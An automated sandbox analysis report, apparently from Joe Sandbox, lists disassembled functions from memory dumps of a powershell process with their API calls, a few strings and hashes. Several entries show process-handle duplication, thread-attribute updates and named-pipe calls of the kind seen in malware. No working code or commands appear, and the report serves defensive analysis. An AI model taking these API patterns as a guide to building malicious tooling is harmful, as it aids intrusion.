Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
Instruction ID: abd07d227eee375e8abb98b1069570429d7200c8e8b6d7d96925fde3d16b3b9b
Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
Instruction Fuzzy Hash: D7216D3D727A40D5FBA0DB29E9447EA23A1F7B7B84F8D44118809425A1CFADC84DC717

Function 000001A6ED2FFF10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED2FFF4C

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FFF57
memcpy_s.LIBCMT ref: 000001A6ED30001C
_fileno.LIBCMT ref: 000001A6ED300087
_filbuf.LIBCMT ref: 000001A6ED3000B5
_errno.LIBCMT ref: 000001A6ED300105

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 3f3dc365440aa2115fb6cd6e608bab10787d9be18d8fabc248aa910345d033f7
Instruction ID: d69acbed9a6b25ad9802a45b991a91b0f625a380816da02218fab6caae9d39d0
Opcode Fuzzy Hash: 3f3dc365440aa2115fb6cd6e608bab10787d9be18d8fabc248aa910345d033f7
Instruction Fuzzy Hash: 71513D39706250C6F668CA2E95007ED6591B367BF4F2C8B11AF3953BD5DB34C49D8242

Function 000001A6ED350B10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED350B4C

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED350B57
memcpy_s.LIBCMT ref: 000001A6ED350C1C
_fileno.LIBCMT ref: 000001A6ED350C87
_filbuf.LIBCMT ref: 000001A6ED350CB5
_errno.LIBCMT ref: 000001A6ED350D05

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
Instruction ID: 787aec024b3a76160875ef88a8f87e7efec034e9b50b975d16ce5d5541a5acea
Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
Instruction Fuzzy Hash: 41515839707240C2FA28CA6E95407EAB6D0B773BF4F1C4714AE3947BD5CB7AD4998242

Function 000001A6ED2F1030 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 150COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2F1063

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

Part of subcall function 000001A6ED2EC444: malloc.LIBCMT ref: 000001A6ED2EC457

free.LIBCMT ref: 000001A6ED2F115E
free.LIBCMT ref: 000001A6ED2F116B

Part of subcall function 000001A6ED2FE644: _errno.LIBCMT ref: 000001A6ED2FE664

Strings

n from %d (%u), xrefs: 000001A6ED2F1229
1:%u/'); %s, xrefs: 000001A6ED2F10F9
open process: %d (%u), xrefs: 000001A6ED2F10BF

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$freemalloc$_callnewh
String ID: 1:%u/'); %s$n from %d (%u)$open process: %d (%u)
API String ID: 2029259483-317027030
Opcode ID: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
Instruction ID: adb738c5df48139faaa9b837d06f603ea5f4df56663ae6cce5612ce77d499bba
Opcode Fuzzy Hash: dc04f393f0e4fed79304e7eb9afd54a7656e6f03fcd842c9ac36e4d1f5269005
Instruction Fuzzy Hash: F161F239305751CAEB50DB69E4402EEA3A1F3A6B80F540016EF4953B9AEF7CC50DCB41

Function 000001A6ED35A348 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 000001A6ED35A375

Part of subcall function 000001A6ED353E58: _FF_MSGBANNER.LIBCMT ref: 000001A6ED353E75
Part of subcall function 000001A6ED353E58: _NMSG_WRITE.LIBCMT ref: 000001A6ED353E7F

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000001A6ED35A3F8
EnterCriticalSection.KERNEL32 ref: 000001A6ED35A414
LeaveCriticalSection.KERNEL32 ref: 000001A6ED35A424
_calloc_crt.LIBCMT ref: 000001A6ED35A49A
__lock_fhandle.LIBCMT ref: 000001A6ED35A502

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
String ID:
API String ID: 445582508-0
Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
Instruction ID: 559635718ab02d6fe955e613e35e97ed727715236d9db5f1d766abb2d00eab29
Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
Instruction Fuzzy Hash: 7951E07A702780C2EB20CF18D4443ADA3A5FBA7B98F1D4525DA8A477E0DB78D859D702

Function 000001A6ED341694 Relevance: 9.1, APIs: 6, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 000001A6ED345FEC: malloc.LIBCMT ref: 000001A6ED346008

Part of subcall function 000001A6ED350620: _errno.LIBCMT ref: 000001A6ED350577
Part of subcall function 000001A6ED350620: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED350582

fseek.LIBCMT ref: 000001A6ED341730

Part of subcall function 000001A6ED350EA4: _errno.LIBCMT ref: 000001A6ED350ECC
Part of subcall function 000001A6ED350EA4: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED350ED7

_ftelli64.LIBCMT ref: 000001A6ED341738

Part of subcall function 000001A6ED350F18: _errno.LIBCMT ref: 000001A6ED350F36
Part of subcall function 000001A6ED350F18: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED350F41

fseek.LIBCMT ref: 000001A6ED341748

Part of subcall function 000001A6ED350EA4: _fseek_nolock.LIBCMT ref: 000001A6ED350EF5

GetFullPathNameA.KERNEL32 ref: 000001A6ED34176B
malloc.LIBCMT ref: 000001A6ED341788

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

Part of subcall function 000001A6ED33D044: malloc.LIBCMT ref: 000001A6ED33D057

Part of subcall function 000001A6ED33D074: htonl.WS2_32 ref: 000001A6ED33D07F

fclose.LIBCMT ref: 000001A6ED341845

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
String ID:
API String ID: 3587854850-0
Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
Instruction ID: ffc6ab91d97e22d4279b2cf76a852d2a5252768d2cbe21dce7e865356ea69091
Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
Instruction Fuzzy Hash: E541F839302650C2EB50EB2AE4147EE6251B7EBBD0F584221AE5A07BD7DE3DC50AC702

Function 000001A6ED345C60 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 000001A6ED345C78
GetOEMCP.KERNEL32 ref: 000001A6ED345C82
GetCurrentProcessId.KERNEL32 ref: 000001A6ED345CA8
GetTickCount.KERNEL32 ref: 000001A6ED345CB0

Part of subcall function 000001A6ED35044C: _getptd.LIBCMT ref: 000001A6ED350454

GetCurrentProcess.KERNEL32 ref: 000001A6ED345CEC

Part of subcall function 000001A6ED340C64: GetModuleHandleA.KERNEL32 ref: 000001A6ED340C79
Part of subcall function 000001A6ED340C64: GetProcAddress.KERNEL32 ref: 000001A6ED340C89

GetCurrentProcessId.KERNEL32 ref: 000001A6ED345D5E

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
String ID:
API String ID: 3426420785-0
Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
Instruction ID: 2f9c3d18462c0bc8d2f6891c2914acb3a088cc9177e9d1ee637303021e9be03f
Opcode Fuzzy Hash: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
Instruction Fuzzy Hash: 5541CE3E722610D5FB10EB79D9447DD23A0ABAB784F480512EE19936E6EE3DC40EC712

Function 000001A6ED346F2C Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED346F5E

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

htonl.WS2_32 ref: 000001A6ED346F91
recvfrom.WS2_32 ref: 000001A6ED346FD5
WSAGetLastError.WS2_32 ref: 000001A6ED346FE2

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
String ID:
API String ID: 2310505145-0
Opcode ID: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
Instruction ID: 1671cd5683958f660d8803c0faf1a764129932b9fab0650fc670cf19ccb63f6e
Opcode Fuzzy Hash: 2261c4ce2f877d491e78f0891c545d8b3f459d63dae9fe63479e894e722204df
Instruction Fuzzy Hash: E1418A79303A40C2FB20CF29E44479A77A1F7A7795F1C4125EA89477A4DB3EC48ACB41

Function 000001A6ED3479C4 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Part of subcall function 000001A6ED34CD6C: NtOpenProcess.NTDLL ref: 000001A6ED34CE0D

GetLastError.KERNEL32 ref: 000001A6ED3479FF
UpdateProcThreadAttribute.KERNEL32 ref: 000001A6ED347A3F
GetLastError.KERNEL32 ref: 000001A6ED347A49
GetCurrentProcess.KERNEL32 ref: 000001A6ED347A7E

Part of subcall function 000001A6ED34CA74: NtDuplicateObject.NTDLL ref: 000001A6ED34CB10

GetCurrentProcess.KERNEL32 ref: 000001A6ED347ABE
GetCurrentProcess.KERNEL32 ref: 000001A6ED347AEF

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: Process$Current$ErrorLast$AttributeDuplicateObjectOpenProcThreadUpdate
String ID:
API String ID: 2604945796-0
Opcode ID: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
Instruction ID: db709bb0a987e55bcec5223c047349429655cfe446b216b6042c4cf02c615747
Opcode Fuzzy Hash: b3d57bf1a8e1718da0dab59a644853e162df0a73d9a39d542a15f5b5bcb328ed
Instruction Fuzzy Hash: 92419F7A316780C6EB60CF1A94043D977A0F7ABBD8F0C4125AA8947B95DF7DC60A8742

Function 000001A6ED2FFA20 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED2FF977

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FF982
_getstream.LIBCMT ref: 000001A6ED2FF9A2
_errno.LIBCMT ref: 000001A6ED2FF9B4
_errno.LIBCMT ref: 000001A6ED2FF9C6
_openfile.LIBCMT ref: 000001A6ED2FF9F4

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
Instruction ID: e324ade201a37adb28a99d9209f85e7b7cdfa77ea84f91c0190bf7cce78b72f8
Opcode Fuzzy Hash: 0ee48a0889aaee90efd1175476a0cb7edf48224d72ecded3f82ab5c2f8e8549f
Instruction Fuzzy Hash: 3F21EB3930A786D9FB91DB2998013DEA6907767BC0F5C48219F49A7BD6EB3CC4088716

Function 000001A6ED350620 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED350577

Part of subcall function 000001A6ED351D18: _getptd_noexit.LIBCMT ref: 000001A6ED351D1C

_invalid_parameter_noinfo.LIBCMT ref: 000001A6ED350582
_getstream.LIBCMT ref: 000001A6ED3505A2
_errno.LIBCMT ref: 000001A6ED3505B4
_errno.LIBCMT ref: 000001A6ED3505C6
_openfile.LIBCMT ref: 000001A6ED3505F4

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
Instruction ID: 5bb8bf1bf41c73b179f413d80d7760525f955a03723b00cd8c0526a2cee45d0b
Opcode Fuzzy Hash: e39adbfa2b2f6f7307badbfd63093f86f5a875a8f375d579bd57b533050ef8dc
Instruction Fuzzy Hash: 8C21E77970B781C1FB61DB2A99013EE62D1BB67BC0F5C4821AE8997B96DB3DC4048702

Function 000001A6ED309B3C Relevance: 9.1, APIs: 6, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001A6ED309B55

Part of subcall function 000001A6ED301118: _getptd_noexit.LIBCMT ref: 000001A6ED30111C

__lock_fhandle.LIBCMT ref: 000001A6ED309B9D
__doserrno.LIBCMT ref: 000001A6ED309BD2
_errno.LIBCMT ref: 000001A6ED309BD9

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit
String ID:
API String ID: 2102446242-0
Opcode ID: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
Instruction ID: 353e135238b6bce849a2939364684ea4139859fe9e749d05d75be3430e196596
Opcode Fuzzy Hash: acc1e709539f3a0e8ebe9ec8259c6fe6fa9b3b7ac075e700e957115c0bfbe106
Instruction Fuzzy Hash: 20210239702641C5FB15EF6D98913ED6692A7A37F0F4D4118EA26473D3EAB8884C8326

Function 000001A6ED33FC64 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED33FC85

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F308

free.LIBCMT ref: 000001A6ED33FCC0
fwrite.LIBCMT ref: 000001A6ED33FD01
fclose.LIBCMT ref: 000001A6ED33FD09
free.LIBCMT ref: 000001A6ED33FD16

Part of subcall function 000001A6ED34F244: HeapFree.KERNEL32 ref: 000001A6ED34F25A
Part of subcall function 000001A6ED34F244: _errno.LIBCMT ref: 000001A6ED34F264
Part of subcall function 000001A6ED34F244: GetLastError.KERNEL32 ref: 000001A6ED34F26C

GetLastError.KERNEL32 ref: 000001A6ED33FD1B

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
String ID:
API String ID: 1616846154-0
Opcode ID: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
Instruction ID: 3e09e4fb06e36090ec343ffc77d32bd290535053e0b2cae4cfd124ffe35b5c67
Opcode Fuzzy Hash: 17de93f2489608755237434f8f5e09f648d27c8e17da9d8174f51a1e36afe512
Instruction Fuzzy Hash: 4011B43D306B40C1EA10FB1AA1053EE5350A7A7FD4F9C4221AE6947BCBDE3DC50A8742

Function 000001A6ED344488 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001A6ED3444A6
WaitNamedPipeA.KERNEL32 ref: 000001A6ED3444BB
CreateFileA.KERNEL32 ref: 000001A6ED3444E5
SetNamedPipeHandleState.KERNEL32 ref: 000001A6ED344507
DisconnectNamedPipe.KERNEL32 ref: 000001A6ED344514
SetLastError.KERNEL32 ref: 000001A6ED344529

Memory Dump Source

Source File: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED330000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED378000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED37E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED381000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4603295907.000001A6ED383000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed330000_powershell.jbxd

Yara matches

Similarity

API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
String ID:
API String ID: 3798860377-0
Opcode ID: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
Instruction ID: 80b73db50fe4b0df41ba5d57662c2358238ceab93f57a2f86cb418a01c5c98b6
Opcode Fuzzy Hash: 66f56032a1747051bfe9465942bea2b3a251e1270fb13d2c0e90442697245dfd
Instruction Fuzzy Hash: 5211D63A715A50C2FB20CB29F51475D2251F797BE4F494260DA5947A94CFBDC44A8702

Function 000001A6ED2FE3EC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED2FE40F

Part of subcall function 000001A6ED2FE684: _FF_MSGBANNER.LIBCMT ref: 000001A6ED2FE6B4
Part of subcall function 000001A6ED2FE684: _NMSG_WRITE.LIBCMT ref: 000001A6ED2FE6BE
Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE6F2
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE6FD
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE708

malloc.LIBCMT ref: 000001A6ED2FE41D

Part of subcall function 000001A6ED2FE684: _callnewh.LIBCMT ref: 000001A6ED2FE718
Part of subcall function 000001A6ED2FE684: _errno.LIBCMT ref: 000001A6ED2FE71D

malloc.LIBCMT ref: 000001A6ED2FE43F
_snprintf.LIBCMT ref: 000001A6ED2FE45A

Part of subcall function 000001A6ED2FEA3C: _errno.LIBCMT ref: 000001A6ED2FEA73
Part of subcall function 000001A6ED2FEA3C: _invalid_parameter_noinfo.LIBCMT ref: 000001A6ED2FEA7E

malloc.LIBCMT ref: 000001A6ED2FE475

Strings

dpoolWait, xrefs: 000001A6ED2FE444

Memory Dump Source

Source File: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A6ED2E0000, based on PE: true

Associated: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a6ed2e0000_powershell.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID: dpoolWait
API String ID: 2026495703-1875951006
Opcode ID: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
Instruction ID: bfbf0afbdf262bfb41e4d36f716908a68eccfb97d300182fac520836ef58e917
Opcode Fuzzy Hash: 8070209c1cbe6b8a0a820429e4883b75791e823d018c18b7f063917c64386bf6
Instruction Fuzzy Hash: 8001267570279089EA85DB16B800B9D7299F7AAFE0F294619EF68537C6CF38C0058B41

Function 000001A6ED34EFEC Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 000001A6ED34F00F

Part of subcall function 000001A6ED34F284: _FF_MSGBANNER.LIBCMT ref: 000001A6ED34F2B4
Part of subcall function 000001A6ED34F284: _NMSG_WRITE.LIBCMT ref: 000001A6ED34F2BE
Part of subcall function 000001A6ED34F284: HeapAlloc.KERNEL32 ref: 000001A6ED34F2D9
Part of subcall function 000001A6ED34F284: _callnewh.LIBCMT ref: 000001A6ED34F2F2
Part of subcall function 000001A6ED34F284: _errno.LIBCMT ref: 000001A6ED34F2FD
